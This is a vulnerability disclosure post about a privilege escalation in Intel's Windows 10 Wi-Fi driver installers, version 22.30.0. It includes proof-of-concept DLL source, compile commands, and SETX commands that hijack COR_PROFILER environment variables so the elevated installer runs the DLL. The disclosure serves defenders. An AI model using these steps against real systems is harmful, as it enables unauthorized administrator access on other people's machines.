Windows 10 Wi-Fi Drivers For Intel Wireless Adapters 22.30.0 Privilege Escalation

`Hi @ll,  
  
the executable installers version 22.30.0 (Latest), published 2/23/2021,  
for the "Windows® 10 Wi-Fi Drivers for Intel® Wireless Adapters",  
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>  
and  
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>,  
available from  
<https://downloadcenter.intel.com/download/30208/Windows-10-Wi-Fi-Drivers-for-Intel-Wireless-Adapters>  
are (SURPRISE!) vulnerable: they allow arbitrary code execution WITH  
local escalation of privilege.  
  
  
CVSS 3.0 score: 8.2 (High)  
CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H  
  
  
Demonstration:  
~~~~~~~~~~~~~~  
  
0. Log on with an arbitrary user account.  
  
1. Save the following source as poc.c in an arbitrary directory:  
  
--- poc.c ---  
// Copyright (C) 2004-2021, Stefan Kanthak <[email protected]>  
  
#define STRICT  
#define UNICODE  
#define WIN32_LEAN_AND_MEAN  
  
#include <windows.h>  
  
const STARTUPINFO si = {sizeof(si)};  
  
__declspec(safebuffers)  
BOOL WINAPI _DllMainCRTStartup(HANDLE hModule,  
DWORD dwReason,  
CONTEXT *lpContext)  
{  
WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";  
  
PROCESS_INFORMATION pi;  
#if 0  
if (dwReason != DLL_PROCESS_ATTACH)  
return FALSE;  
#endif  
if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,  
CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,  
NULL, NULL, &si, &pi))  
{  
CloseHandle(pi.hThread);  
CloseHandle(pi.hProcess);  
}  
  
return TRUE;  
}  
--- EOF ---  
  
2. Start the command prompt of the 32-bit Windows Software Development Kit,  
then run the following command lines to compile poc.c and link it as  
poc.dll:  
  
CL.exe /Zl /W4 /Ox /GAFy /c poc.c  
LINK.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /OPT:REF /RELEASE /SUBSYSTEM:Windows poc.obj  
kernel32.lib  
  
ALTERNATIVE for steps 1 and 2:  
  
2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>  
and save it as poc.dll in an arbitrary directory.  
  
See <https://skanthak.homepage.t-online.de/sentinel.html> for its  
documentation, and  
<https://insights.sei.cmu.edu/cert/2016/06/bypassing-application-whitelisting.html>  
for an example how to use it.  
  
3. Logon with the user account created during Windows setup.  
  
4. Download  
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>  
and  
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>  
and save them in an arbitrary directory.  
  
5. Start a command prompt (UNELEVATED!) and run the following command lines  
(replace <directory> with the pathname of the directory where you built  
or saved poc.dll):  
  
SETX.exe COR_ENABLE_PROFILING 1  
SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}  
SETX.exe COR_PROFILER_PATH <directory>\poc.dll  
  
JFTR: this is just one method to set these environment variables without  
the need to elevate!  
  
6. Execute WiFi_22.30.0_Driver32_Win10.exe and WiFi_22.30.0_Driver64_Win10.exe  
per double-click, acknowledge the UAC prompt, then admire the console  
windows showing the output of WHOAMI.exe running elevated.  
  
  
stay tuned, and far away from Intel's vulnerable crap!  
Stefan Kanthak  
  
  
  
`